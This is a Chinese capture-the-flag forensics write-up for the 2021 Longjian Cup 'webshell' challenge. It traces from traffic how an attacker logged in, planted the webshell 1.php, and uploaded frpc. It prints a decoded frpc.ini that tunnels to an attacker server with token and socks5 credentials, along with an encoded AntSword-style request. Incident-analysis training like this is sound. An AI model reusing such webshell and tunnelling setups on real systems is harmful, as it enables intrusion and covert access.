[2021首届“陇剑杯”网络安全大赛] webshell

题目描述

单位网站被黑客挂马，请您从流量中分析出webshell，进行回答：

1.黑客登录系统使用的密码是[email protected]#___。

2.黑客修改了一个日志文件，文件的绝对路径为___/var/www/html/data/Runtime/Logs/Home/21_08_07.log__。（请确认绝对路径后再提交）

3.黑客获取webshell之后，权限是__www-data__？

4.黑客写入的webshell文件名是___1.php___。(请提交带有文件后缀的文件名，例如x.txt)

5.黑客上传的代理工具客户端名字是___frpc___。（如有字母请全部使用小写）

6.黑客代理工具的回连服务端IP是____192.168.239.123_____。

7.黑客的socks5的连接账号、密码是___0HDft16cLQJ# JTN276Gp__。（中间使用#号隔开，例如admin#passwd）

根据题干提示，黑客可能先从管理员登陆系统，搜索login，找到http回复状态码为200的包

url解密，登陆密码：[email protected]#

ip contains "whoami"
           

因为有提问到用户权限，搜索whoami，第二条正常回显出了phpinfo（不知道为什么）

可以看到user：www-data

日志绝对路径：/var/www/html/data/Runtime/Logs/Home/21_08_07.log(phpinfo里面得到的，拼接一下)

ps.这是74cms的注入 可以看

https://www.cnblogs.com/trevain/p/14217628.html

从黑客管理员成功登陆之后向下看，这段base解开是一句话木马

写入的webshell文件名:1.php

再

ip contains "1.php"

，几个请求都看一下，根据结构应该是用蚁剑链接的webshell

参数a后的内容

FBL3Zhci93d3cvaHRtbC9mcnBjLmluaQ%3D%3D&xa5d606e67883a=5B636F6D6D6F6E5D0A7365727665725F61646472203D203139322E3136382E3233392E3132330A7365727665725F706F7274203D20373737380A746F6B656E3D586133424A66326C35656E6D4E365A3741386D760A0A5B746573745F736F636B355D0A74797065203D207463700A72656D6F74655F706F7274203D383131310A706C7567696E203D20736F636B73350A706C7567696E5F75736572203D2030484446743136634C514A0A706C7567696E5F706173737764203D204A544E32373647700A7573655F656E6372797074696F6E203D20747275650A7573655F636F6D7072657373696F6E203D20747275650A
           

hex解密

[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv

[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true
           

有个包是执行了ls，可以看到frpc.ini